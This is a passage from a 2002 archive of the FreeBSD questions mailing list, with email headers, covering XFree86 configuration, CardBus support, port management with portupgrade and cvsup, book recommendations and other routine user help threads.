FreeBSD 4.5 with XFree86 3.3.6 and startx works as inspected. > I have Slackware 8.0 on the second HDD with exactly the same version > of > XFree86 3.3.6, but this will not start at all. And this on the very > same machine. > Can I just copy the BSD XF86Config file into Slackware? The file is > plain text and > XFree86 is not an OS, it's a tool for many Unix type OS's. Am I > thinking in the > wrong direction here? > As I wrote above, this is a BSD list, but I hope someone have some > experiences to share. Just try it! Save your working file with something like # mv XF86Config XF86Config.old copy your new file to the appropriate place and # startx It will work or not. In case something looks strange hit + + to kill the X server Good luck! Uli. > Thanks, > Thomas > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > *-----------------------------------* * Peter Ulrich Kruppa * * - Wuppertal - * * Germany * *-----------------------------------* To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 7:29:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from ns1.infowest.com (ns1.infowest.com [204.17.177.10]) by hub.freebsd.org (Postfix) with ESMTP id 4426937B407 for ; Wed, 26 Jun 2002 07:29:38 -0700 (PDT) Received: from Presarionb (208.186.110.52.bluegill.infowest.net [208.186.110.52]) by ns1.infowest.com (Postfix) with SMTP id BE13E22665; Wed, 26 Jun 2002 08:29:23 -0600 (MDT) From: Lorin Lund To: "mickey" , questions@FreeBSD.ORG, dsyphers@uchicago.edu Date: Wed, 26 Jun 2002 08:22:07 -0600 X-Priority: 3 (Normal) In-Reply-To: <200206260806.12172.dsyphers@uchicago.edu> Message-Id: Subject: Re: when 32-bit card bus can support? MIME-Version: 1.0 Content-Type: text/plain; charset="big5" X-Mailer: Opera 6.01 build 1041 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG 6/26/2002 7:06:12 AM, David Syphers wrote: >On Wednesday 26 June 2002 07:41 am, mickey wrote: >> I have a question: >> When 32-bit card bus can support >> by FreeBSD?! > >The -current branch supports cardbus. -stable does not, and never will, as >the new bus architecture is too complex to MFC. But the branch that is now -current will someday become 5.0-release won't it? > >-David > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 7:30:32 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id 8037F37B417 for ; Wed, 26 Jun 2002 07:30:03 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5QEU0v05640 for ; Wed, 26 Jun 2002 10:30:01 -0400 Date: Wed, 26 Jun 2002 10:30:00 -0400 (EDT) From: David Kramer To: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, Paul Everlund wrote: > On Wed, 26 Jun 2002, David Kramer wrote: > > > I have to go through the collection of ports and make sure everything I > > need is there, but I'm sure it is. BTW, is there a way to check what > > software is installed on your box? Is there an automated way of > > uninstalling ports? I couldn't find this info on freebsd.org. > > Take a closer look at pkg_info, pkg_delete and pkg_add. You can also I thought ports and packages were two different things. But if packages can me managed as explained above, and ports can be managed as explained below, then my concerns are covered. > delete an installed port by going to /usr/ports/*category*/*app*/, > then make deinstall. THANK YOU!!!! This was another thread on the BLU mailing list recently. I said that if Makefiles had a "make uninstall" to undo "make install", I would be much more likely to use them than RPM's, as I am opposed to management tools that track their information in databases that require a special application to view and change, instead of text files, which can be managed any way one wants. Do most ports have a "make deinstall" option? ------------------------------------------------------------------- DDDD David Kramer http://thekramers.net DK KD DKK D "No matter how much cats fight, DK KD there always seem to be plenty of kittens." DDDD - Abraham Lincoln (1809-1865) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 7:39:48 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.comcast.net (smtp.comcast.net [24.153.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 2C71637B406 for ; Wed, 26 Jun 2002 07:39:38 -0700 (PDT) Received: from [192.168.1.27] (pcp108019pcs.echryh01.nj.comcast.net [68.45.89.210]) by mtaout04.icomcast.net (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 13 2002)) with ESMTP id <0GYB00LSJI21JM@mtaout04.icomcast.net> for freebsd-questions@freebsd.org; Wed, 26 Jun 2002 10:39:37 -0400 (EDT) Date: Wed, 26 Jun 2002 10:39:35 -0400 From: Ralph Dratman Subject: Why does the label editor not show existing mount points? X-Sender: ralph99@popmail.voicenet.com To: freebsd-questions@freebsd.org Message-id: MIME-version: 1.0 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Recently I decided to take Greg Lehey's advice from "The Complete FreeBSD" book and transplant /var into /usr/var. Although I still can't get the procedure to work exactly as Greg presents it (see p. 87), I did eventually make it happen as desired. In the process, I visited the filesystem label editor in sysinstall several times. On each occasion, I had to refer back to an existing df output to remind me where each filesystem is normally mounted, because the label program does not fill in existing mount points. Instead, except for swap partitions, it writes in lieu of my carefully-crafted mount points. Why is this, and should someone (such as myself) modify label to write in the existing mount points from /etc/fstab? I discovered fstab more or less by accident and now realize I can edit the mount points much more easily by modifying that file. But, seems to me, someone who doesn't know this, and is reworking an install, might be better served by using sysinstall with the existing mount points shown. Any insight appreciated. Regards, Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8: 0:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from seven.slakin.net (adsl-67-112-126-134.dsl.pltn13.pacbell.net [67.112.126.134]) by hub.freebsd.org (Postfix) with ESMTP id 468B837B75F for ; Wed, 26 Jun 2002 07:57:08 -0700 (PDT) Received: from localhost (localhost.slakin.net [127.0.0.1]) by seven.slakin.net (Postfix) with ESMTP id 7E6C9753 for ; Wed, 26 Jun 2002 07:57:09 -0700 (PDT) Date: Wed, 26 Jun 2002 07:57:09 -0700 (PDT) From: Matt Snow To: questions@freebsd.org Subject: portupgrade vs. cvsup ports-supfile Message-ID: <20020626075024.T86315-100000@seven.slakin.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I was wondering what the difference is between portupgrade, and doing a cvsup ports-supfile. Can anybody tell me the difference's between the two? * * * * * * * * Matt Snow (@) drama@slakin.net (w) http://slakin.net. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8: 7:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lerlaptop.iadfw.net (lerlaptop.iadfw.net [206.66.13.21]) by hub.freebsd.org (Postfix) with ESMTP id D3F1737B9E2 for ; Wed, 26 Jun 2002 08:05:41 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by lerlaptop.iadfw.net (8.12.4/8.12.4) with ESMTP id g5QF5Y9H000602; Wed, 26 Jun 2002 10:05:35 -0500 (CDT) (envelope-from ler@lerctr.org) Subject: Re: portupgrade vs. cvsup ports-supfile From: Larry Rosenman To: Matt Snow Cc: questions@FreeBSD.ORG In-Reply-To: <20020626075024.T86315-100000@seven.slakin.net> References: <20020626075024.T86315-100000@seven.slakin.net> Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.7 Date: 26 Jun 2002 10:05:34 -0500 Message-Id: <1025103935.377.5.camel@lerlaptop> Mime-Version: 1.0 X-Virus-Scanned: by amavisd-milter (http://amavis.org/) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 2002-06-26 at 09:57, Matt Snow wrote: > I was wondering what the difference is between portupgrade, and doing a > cvsup ports-supfile. CVSUP updates the ports skeletons (the instructions on how to build a port). portupgrade actually builds, based on the above, updated ports for what's installed on the system. > > Can anybody tell me the difference's between the two? > > * * * * * * * * > Matt Snow > (@) drama@slakin.net > (w) http://slakin.net. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:14:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cisco.com (sword.cisco.com [161.44.208.100]) by hub.freebsd.org (Postfix) with ESMTP id B326137BB72 for ; Wed, 26 Jun 2002 08:11:19 -0700 (PDT) Received: from sjt-u10.cisco.com (sjt-u10.cisco.com [10.85.30.63]) by cisco.com (8.8.5-Cisco.1/8.8.8) with ESMTP id LAA27764; Wed, 26 Jun 2002 11:11:15 -0400 (EDT) Received: (sjt@localhost) by sjt-u10.cisco.com (8.8.5-Cisco.1/CISCO.WS.1.2) id LAA11772; Wed, 26 Jun 2002 11:11:14 -0400 (EDT) Date: Wed, 26 Jun 2002 11:11:14 -0400 From: Steve Tremblett To: Matt Snow Cc: questions@FreeBSD.ORG Subject: Re: portupgrade vs. cvsup ports-supfile Message-ID: <20020626111114.E2322@sjt-u10.cisco.com> References: <20020626075024.T86315-100000@seven.slakin.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20020626075024.T86315-100000@seven.slakin.net>; from drama@slakin.net on Wed, Jun 26, 2002 at 07:57:09AM -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG +---- Matt Snow wrote: | I was wondering what the difference is between portupgrade, and doing a | cvsup ports-supfile. | | Can anybody tell me the difference's between the two? The ports system provides a collection of patches and makefiles to build common 3rd party programs on FreeBSD. When you cvsup your ports, what you are doing is updating those makefiles and patch files. It does not upgrade the ports you have already installed. Portupgrade is a build/version management system that handles the building, installation, and upgrading of packages. It is used to upgrade previously installed ports, with special attention to versioning and dependencies. Let's say you've installed widget-1.0 from your ports tree. After cvsupping /usr/ports you look and find that widget-2.0 is available. You then can use portupgrade to upgrade your widget installation, along with the other installed ports that may depend on it. hope this helps -- Steve Tremblett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:14:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from quasi.uchicago.edu (quasi.uchicago.edu [128.135.99.55]) by hub.freebsd.org (Postfix) with ESMTP id 8E35F37BB86 for ; Wed, 26 Jun 2002 08:11:31 -0700 (PDT) Received: from anita (anita.uchicago.edu [128.135.99.35]) by quasi.uchicago.edu (Postfix) with SMTP id 7240CF402 for ; Wed, 26 Jun 2002 10:11:30 -0500 (CDT) Message-ID: <006201c21d23$c05fa630$23638780@uchicago.edu> From: "Kim Scarborough" To: Subject: Getting rid of userland junk Date: Wed, 26 Jun 2002 10:11:30 -0500 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I'd like to strip FreeBSD down as much as possible on a few boxes. I have all the stuff I don't want, like sendmail, ssh, and uucp, disabled in make.conf, so the buildworld doesn't bother with them, which is good... but is there an easy way to figure out what I can delete now? There seems to be no good way to actually remove these components; one can only stop them from being updated. Is there a master packing list somewhere, or do I just need to navigate through all the Makefiles? ------------------------------------------------------------------------------ Kim Scarborough http://www.unknown.nu/kim/ ------------------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:22:27 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id E511137B4F1 for ; Wed, 26 Jun 2002 08:20:53 -0700 (PDT) Received: from daleco [12.145.226.126] by mail.gbronline.com (SMTPD32-7.10) id AB77DAC0296; Wed, 26 Jun 2002 10:19:19 -0500 Message-ID: <005301c21d24$fe8432e0$7ee2910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "Lorin Lund" , "mickey" , , References: Subject: Re: when 32-bit card bus can support? Date: Wed, 26 Jun 2002 10:20:23 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ----- Original Message ----- From: "Lorin Lund" To: "mickey" ; ; Sent: Wednesday, June 26, 2002 9:22 AM Subject: Re: when 32-bit card bus can support? > 6/26/2002 7:06:12 AM, David Syphers wrote: > > >On Wednesday 26 June 2002 07:41 am, mickey wrote: > >> I have a question: > >> When 32-bit card bus can support > >> by FreeBSD?! > > > >The -current branch supports cardbus. -stable does not, and never will, as > >the new bus architecture is too complex to MFC. > > But the branch that is now -current will someday become 5.0-release won't it? Yes, last I heard in early 2003 AD. KDK To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:30: 6 2002 Delivered-To: freebsd-questions@freebsd.org Received: from [209.49.190.34] (fireout.mbakercorp.com [209.49.190.34]) by hub.freebsd.org (Postfix) with SMTP id 394C537B899 for ; Wed, 26 Jun 2002 08:29:17 -0700 (PDT) Received: from no.name.available by [209.49.190.34] via smtpd (for hub.FreeBSD.org [216.136.204.18]) with SMTP; 26 Jun 2002 15:29:17 UT Received: from mbakercorp.com (admin_4.mbakercorp.com) by mailsweeper.mbakercorp.com (Content Technologies SMTPRS 4.2.10) with ESMTP id for ; Wed, 26 Jun 2002 11:30:34 -0400 Received: from gatedom-MTA by mbakercorp.com with Novell_GroupWise; Wed, 26 Jun 2002 11:29:00 -0400 Message-Id: X-Mailer: Novell GroupWise Internet Agent 6.0.1 Date: Wed, 26 Jun 2002 11:28:28 -0400 From: "Joseph Wright" To: Subject: DVD support with NVIDIA Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I was wondering if it is possible to play dvd's on FreeBSD with an "NVIDIA Riva Ultra Vanta TNT2" graphics card. I am not sure if programs like xine and ogle that use open-gl will work with the nvidia. I now there has been a lot of developing on the nvidia drivers but I do not know if this is working or not.. I tried xine and it would not work ending with an error: vidio_out_opengl: no OpenGL support available (glxChooseVisual) videowin_output: driver cannot select a working visual The grpahics/xine port compiled perfectly and appeared to work but fails on startup. thanks joe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:34: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id 4D43F37B40C for ; Wed, 26 Jun 2002 08:32:35 -0700 (PDT) Received: (qmail 12643 invoked by uid 417); 26 Jun 2002 15:32:34 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 26 Jun 2002 15:32:34 -0000 Received: from softhome.net ([63.194.84.111]) (AUTH: PLAIN temperanza@softhome.net) by softhome.net with esmtp; Wed, 26 Jun 2002 09:32:34 -0600 Message-ID: <3D19DE92.5000102@softhome.net> Date: Wed, 26 Jun 2002 08:32:34 -0700 From: La Temperanza User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020612 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Christopher Schulte , questions Subject: Re: Several questions... References: <5.1.1.6.2.20020625143148.0421d118@pop3s.schulte.org> <5.1.1.6.2.20020625153146.044d1278@pop3s.schulte.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Christopher Schulte wrote: > At 01:22 PM 6/25/2002 -0700, La Temperanza wrote: > >> I don't quite get what that means. >.< If a cvsup and rebuilding >> isn't syncing them, what will? > > > You need to make sure you install the new world and kernel at the same > time, built from the same source. > > Take a look at this, read it all the way through.... a lot of info but > it will pay off. > > http://www.freebsd.org/handbook/makeworld.html I just did everything exactly as the page told me, and nothing's changed. Any other ideas? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:42:11 2002 Delivered-To: freebsd-questions@freebsd.org Received: from raq02.vbcomm.net (raq02.vbcomm.net [208.178.120.34]) by hub.freebsd.org (Postfix) with ESMTP id 5B13F37B9BD for ; Wed, 26 Jun 2002 08:39:07 -0700 (PDT) Received: from mrincubator.org (vpn.ckhlaw.com [208.178.123.53]) by raq02.vbcomm.net (8.9.3/8.9.3) with ESMTP id LAA13514; Wed, 26 Jun 2002 11:37:13 -0400 Message-ID: <3D19DFC6.D1D54159@mrincubator.org> Date: Wed, 26 Jun 2002 11:37:42 -0400 From: Mark Filipak X-Mailer: Mozilla 4.77 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Bill Moran Cc: pjklist@ekahuna.com, Kevin Golding , questions@FreeBSD.ORG Subject: Re: I hate to bring it up again (spamming) References: <20020626101156585.AAA781@empty1.ekahuna.com> <20020626111142993.AAA791@empty1.ekahuna.com@pc02.ekahuna.com> <3D19ACC6.6010807@potentialtech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Bill Moran wrote: > > Would you folks kindly mind taking this to -chat or some other > place? You state the spam problems looks bad to new members of the > community, and yet this incessant argument looks worse to people > joining this list than anything else. > This discussion DOES NOT belong on this list. IT CERTAINLY DOES! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:45:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from corten2.billschoolcraft.com (adsl-63-193-247-201.dsl.snfc21.pacbell.net [63.193.247.201]) by hub.freebsd.org (Postfix) with ESMTP id 5E6EE37B800 for ; Wed, 26 Jun 2002 08:42:18 -0700 (PDT) Received: from corten8.billschoolcraft.com ([192.168.7.8]) by corten2.billschoolcraft.com with esmtp (Exim 3.22 #1 (Debian)) id 17NEvs-00073Z-00 for ; Wed, 26 Jun 2002 08:42:12 -0700 Date: Wed, 26 Jun 2002 08:49:29 -0700 (PDT) From: Bill Schoolcraft X-X-Sender: bill@corten8 To: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: Message-ID: System-ID: [en] (I; Linux i86pc) MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At Wed, 26 Jun 2002 it looks like David Kramer composed: > I'm Associate Director at the Boston Linux and UNIX group > (http://www.blu.org) (we also cover *BSD, but you can only make the name > so long ;). Our last meeting was about UNIX standards, and this was a > very hot topic at that meeting. Thank you for having a computer group that covers the full picture. I was a journeyman machinist prior to leaping into UNIX and the first thing (fatal_thing) I saw with my co-workers was their distribution-centric way of life. It was either Linux or nothing, FreeBSD or nothing, OpenBSD or nothing.....etc. I viewed Unix/Linux/FreeBSD as ONE UNIX ENGINE with some minor differences and if I were to just focus on one flavor then I'd limit my ability to Unix journeyman. Solaris was and is still TOUGH but it made me a better FreeBSD and Linux mechanic and I actually invested in a Ultra-10 for my home to just be more level in my endeavours. I actually use FreeBSD on a daily basis at my work along with Solaris boxes (Intel and Sparc) to keep fluent and I work at a Linux company !!!. In each OS I pick a different letter of the alphabet and in my shell (bash) I type the letter "a" and hit my tab key twice to list all the commands that start with "a" then start reading manpages. I do this with 3 xterms open to compare all listing of FreeBSD, Solaris, and Linux commands that start with "a" and that is what I do to TRY to be the best I can. [Solaris_letter_a_] aafire add_drv amt arch audioconvert autoconf aainfo addbib answerbook2 arp audioplay autoheader aasavefont addtosmbpass answerbook2_admin as audiorecord automake aatest admin apm asa audit automount accept admintool appcert asppp2pppd auditconfig autopush accessx aedplot appletviewer at auditd autoreconf acctadm alias appres atobm auditreduce autoscan acctcom aliasadm apptrace atoplot auditstat autoupdate aclocal align_equals apropos atq audlinks awk adb allocate ar atrm auths [FreeBSD_letter_a_] a2p agrep apprentice.gmaplayer artsshell atrm a2ps aicon appres artswrapper audiofile-config ac airport apropos as aumix accept alias aps2file ascii-xfr autoconf213 accton amd apsfilter-bug asclock autoheader213 acroread amp apspreview asclock_applet autopopups add amq ar ascpu autoreconf213 addftinfo an arp asmem autorespond addr2line ancontrol arping asmon autoscan213 addresses another_clock_applet arprelease asprint autosig adduser antipolix-client artsc-config astime autoupdate213 addxface antipolix-server artscat at awk adjkerntz apm artsd atm affenspiel apmd artsdsp atmarpd afmtodit appletproxy artsmessage atobm afterstep apply artsplay atq [Linux_letter_a_] a2p alien apple_mv asp2php a2ps amadmin apple_rm aspell ab amcheck appletproxy at abbrowser_conduit amcheckdb appres atalkd ac amcleanup apropos atd accton amdump apxs atktopbm achfile amflush ar atobm aclocal amgetconf arch atq actctrl amlabel ark atrm addDbDomDocument amor arp atrun add_netatalk_printer amoverview arping audiocompose adddebug amplot arpsnmp audiofile-config addftinfo amrecover arpwatch audiosend addr2line amreport artsbuilder aumix addr2name.awk amrestore artsc-config aumix-minimal addresses amrmtape artscat authconfig adduser amstatus artscontrol autoconf adsl-connect amtape artsd autoexpect adsl-start amtoc artsdsp autoheader adsl-status amverify artsmessage automake adsl-stop anaconda artsplay automount adv1tov2 anacron artsshell autopasswd aecho animate artswrapper autoreconf afile anno as autorun afmtodit another_clock_applet as86 autoscan afpd answer as86_encap autoupdate afpd-mtab.pl anytopnm ascii-xfr autovbox afppasswd apacheconf asciitopgm avmcapictrl agetty apm asclock_applet aweset alarmd apmd ash awk ali apmsleep ash.static alias apple_cp askrunlevel -- |<--------------------------------72---------------------------------->| Bill Schoolcraft PO Box 210076 -o) San Francisco CA 94121 /\ "UNIX, A Way Of Life." _\_v http://forwardslashunix.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 8:48:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web14008.mail.yahoo.com (web14008.mail.yahoo.com [216.136.175.124]) by hub.freebsd.org (Postfix) with SMTP id EAEE637BC2F for ; Wed, 26 Jun 2002 08:46:09 -0700 (PDT) Message-ID: <20020626154609.98093.qmail@web14008.mail.yahoo.com> Received: from [80.88.139.115] by web14008.mail.yahoo.com via HTTP; Wed, 26 Jun 2002 08:46:09 PDT Date: Wed, 26 Jun 2002 08:46:09 -0700 (PDT) From: Esan Korede To: freebsd-questions@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I will like to use freeBSD after being introduced to it by a friend, but I will like to know which of the books you would recommend for a beginer as well as an advanced user and also how to get this book. Are the books also free or do I have to pay for them? I need a book that will take me from the elimentary to the advanced stage as I have not used it before. Thanks. Esan, O. K. (Engr.) __________________________________________________ Do You Yahoo!? Yahoo! - Official partner of 2002 FIFA World Cup http://fifaworldcup.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 9: 5:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from free.bsd.net (free.bsd.net [213.221.117.2]) by hub.freebsd.org (Postfix) with SMTP id BA42437B401 for ; Wed, 26 Jun 2002 09:05:03 -0700 (PDT) Received: (qmail 88524 invoked by uid 100); 26 Jun 2002 16:04:58 -0000 X-BSD-Qmail-VirusScan: scanned by Sophos Anti-Virus v3.58 FILE NOT INFECTED: [1025107498.88518-0.free.bsd.net] FILE NOT INFECTED: [1025107498.88518-1.free.bsd.net] Mail-Followup-To: freebsd-questions@FreeBSD.ORG, annointedy2k@yahoo.com Date: Wed, 26 Jun 2002 18:04:58 +0200 From: Martin Hasenbein To: Esan Korede Cc: freebsd-questions@FreeBSD.ORG Subject: Re: your mail Message-ID: <20020626180458.A84551@free.bsd.net> Reply-To: Martin Hasenbein References: <20020626154609.98093.qmail@web14008.mail.yahoo.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="a8Wt8u1KmwUX3Y2C" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020626154609.98093.qmail@web14008.mail.yahoo.com>; from annointedy2k@yahoo.com on Mi , Jun 26, 2002 at 08:46:09am -0700 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --a8Wt8u1KmwUX3Y2C Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mi 26 Jun (08:46:09) Esan Korede (annointedy2k@yahoo.com) wrote: Hi, > I will like to use freeBSD after being introduced to > it by a friend, but I will like to know which of the Good choice!! ;-)) > books you would recommend for a beginer as well as an > advanced user and also how to get this book.=20 Links are below. You can view the Handbook online or buy it at: http://www.freebsdmall.com or several other online-shops. > Are the books also free or do I have to pay for them? You should take a look at: http://www.freebsd.org and http://www.freebsd.org/handbook/index.html This is the Online-Handbook, which is also available as a Paperback and sold on some Online-Shops. > I need a book that will take me from the elimentary to > the advanced stage as I have not used it before. Then you should use the second link :) /mh --=20 Martin Hasenbein -- mh@bsd.net -- http://bsd.net UNIX, a way of life. FreeBSD, my choice of living. --a8Wt8u1KmwUX3Y2C Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQE9GeYqqLL0BvqAa6ERAqyNAKCfiVI3VBsDx53LYA8neUP23RfnVwCfSqg3 Qh+Jxqwec5u/DtrAxWVV62Q= =a/rc -----END PGP SIGNATURE----- --a8Wt8u1KmwUX3Y2C-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 9:17:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id DBF5D37B401 for ; Wed, 26 Jun 2002 09:17:07 -0700 (PDT) Received: from myrealbox.com jogegabsd@smtp-send.myrealbox.com [216.230.149.192] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Wed, 26 Jun 2002 10:17:04 -0600 Message-ID: <3D19E8FF.7020307@myrealbox.com> Date: Wed, 26 Jun 2002 10:17:03 -0600 From: Jose Gerardo Amaya Giron User-Agent: Mozilla/5.0 (X11; U; Linux i386; en-US; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3 X-Accept-Language: en-us MIME-Version: 1.0 To: Esan Korede Cc: freebsd-questions@FreeBSD.ORG Subject: Re: References: <20020626154609.98093.qmail@web14008.mail.yahoo.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Esan Korede wrote: 